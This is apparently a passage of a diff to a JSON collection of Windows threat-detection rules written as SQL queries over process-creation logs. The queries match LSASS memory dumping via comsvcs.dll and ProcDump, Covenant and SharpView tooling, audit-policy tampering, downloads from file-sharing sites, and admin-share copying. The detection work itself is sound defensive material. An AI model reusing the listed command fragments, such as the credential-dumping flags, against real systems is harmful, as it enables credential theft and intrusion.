'%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\tttracer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" }, { - "title": "Abused Debug Privilege by Arbitrary Parent Processes", - "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", + "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", "status": "test", - "description": "Detection of unusual child processes by different system processes", - "author": "Semanur Guneysu @semanurtg, oscd.community", + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unknown" + "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" + "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" }, { - "title": "HackTool - HandleKatz LSASS Dumper Execution", - "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", + "title": "Manage Engine Java Suspicious Sub Process", + "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", "status": "experimental", - "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], "falsepositives": [ - "Unknown" + "Legitimate sub processes started by Manage Engine ServiceDesk Pro" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\java.exe%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_handlekatz.yml" + "filename": "proc_creation_win_susp_manageengine_pattern.yml" }, { - "title": "Privilege Escalation via Named Pipe Impersonation", - "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "title": "Suspicious Usage Of ShellExec_RunDLL", + "id": "d87bd452-6da1-456e-8155-7dc988157b7d", "status": "experimental", - "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", - "author": "Tim Rauch", + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021" + "attack.defense_evasion" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" + "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" }, { - "title": "Potential Arbitrary Command Execution Using Msdt.EXE", - "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", - "status": "experimental", - "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Renamed ProcDump Execution", + "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "status": "test", + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Procdump illegaly bundled with legitimate software", + "Administrators who rename binaries (should be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" + "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" }, { - "title": "HackTool - Covenant PowerShell Launcher", - "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", - "status": "test", - "description": "Detects suspicious command lines used in Covenant luanchers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "HackTool - SharpView Execution", + "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "status": "experimental", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1564.003" + "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'SharpView.exe' OR NewProcessName LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_covenant.yml" + "filename": "proc_creation_win_hktl_sharpview.yml" }, { - "title": "System File Execution Location Anomaly", - "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", - "status": "experimental", - "description": "Detects a Windows program executable started from a suspicious folder", - "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", + "title": "Process Dumping Via Comsvcs.DLL", + "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "status": "test", + "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", + "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1036", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Exotic software" + "Unlikely, because no one should dump the process memory in that way" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dashost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\defrag.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dwm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_exe_anomaly.yml" + "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" }, { - "title": "Suspicious Dump64.exe Execution", - "id": "129966c9-de17-4334-a123-8b58172e664d", - "status": "test", - "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", - "author": "Austin Songer @austinsonger, Florian Roth", + "title": "Suspicious Whoami.EXE Execution", + "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Dump64.exe in other folders than the excluded one" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dump64.yml" + "filename": "proc_creation_win_whoami_susp_flags.yml" }, { - "title": "RDP Connection Allowed Via Netsh.EXE", - "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "title": "Copy from Admin Share", + "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", "status": "test", - "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", - "author": "Sander Wiebing", + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate administration activity" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" + "filename": "proc_creation_win_susp_copy_lateral_movement.yml" }, { - "title": "APT29 2018 Phishing Campaign CommandLine Indicators", - "id": "7453575c-a747-40b9-839b-125a0aae324b", + "title": "Suspicious Double Extension File Execution", + "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "Florian Roth (Nextron Systems), @41thexplorer", + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "author": "Florian Roth (Nextron Systems), @blu3_team (idea), 